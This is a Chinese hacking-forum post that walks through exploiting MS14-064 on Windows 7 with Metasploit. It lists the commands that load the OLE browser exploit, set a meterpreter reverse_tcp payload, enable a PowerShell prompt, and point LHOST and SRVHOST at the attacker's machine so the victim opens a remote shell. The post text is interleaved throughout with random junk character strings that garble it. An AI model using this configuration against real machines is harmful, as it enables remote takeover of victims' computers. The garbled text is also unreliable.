找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1478|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

& N, @# \# P/ ]2 W. H: h 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 - K$ Z2 q$ @0 E/ M" [3 b

% G) U V1 l6 C

$ L# L( ~2 w1 p( m/ d, e# |# ^ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 1 L) e2 q6 ?1 X) y' m

7 [$ ]) L" ~/ K

# u' ?/ Q+ z: y- c 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp - L7 b: U7 l5 c9 A6 m

8 w9 D9 v7 {% [6 { n' r6 t

4 U) e9 {5 `# E* r- t2 T* ^* e             set AllowPowershellPrompt true 4 e, r9 ]4 J8 f% M) S2 `: s6 a. O

$ |2 C) C, H* L) L2 }9 n- w s

+ j: ?2 @. P6 C3 ^& G" z             Set LHOST 192.168.0.109& {7 T* o+ D" R1 e8 i; M

9 x) s- ~* \% G4 [. h

/ a7 `+ D$ o7 e p- L5 ~& w; A             set SRVHOST 192.168.0.109 3 g7 H8 l% Y; B

4 e$ x. {8 ^' E' q2 {

/ N1 l+ b5 d# g8 n+ ?             Set uripath share 5 n- m, P( D/ H# `& I1 S4 ?

; _* j7 @# R' U' i G

/ _2 r: I$ n9 B8 ^3 S% v% e             Set srvport 80 l/ l" o; s3 @

" |' e% d6 G4 ?- [

! R' {' |; h8 _  3 s4 M2 o# v& P% D% C: K7 V& W

! D% C% K3 S) s+ R

1 k: j. C( }, t) ] ^3 X/ O/ C   ; s& u' U! E, |8 m, o, {) f; F

% Y6 X, b- w3 W$ {# c5 ] z

5 L3 O1 X' m5 J% X4 l$ A   : h3 C/ S% P: t) C4 N0 I/ h

" n/ T% w) \: H* b

: t0 E) B2 l6 W" ]: x   . h) k: P' N! k/ {% R, h" ?

$ U5 c$ `4 E7 \' e0 X

" w8 X3 |8 W: y4 w  5 M( x% K' [% ]8 x, p2 e$ T1 c( S

$ y$ E& u3 {+ L8 ~- T3 f

! r0 j; c1 {) a 下面我们来访问本地地址如图: 9 x' ]' z" @: B+ }. K

( h" F* I3 A# C( l: \+ d

/ W+ n( R" s& n3 ]) u% ?: X  . v$ `0 _5 v6 O- w) c9 [7 S

/ O# G) a- J9 |9 _

. r* T6 C, t' c7 F. t( S  8 G8 Y D* ?2 H2 o6 M

m( |* M7 r8 ]+ Y

/ F" K4 _' D9 } 5 F. D' c& R2 m

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表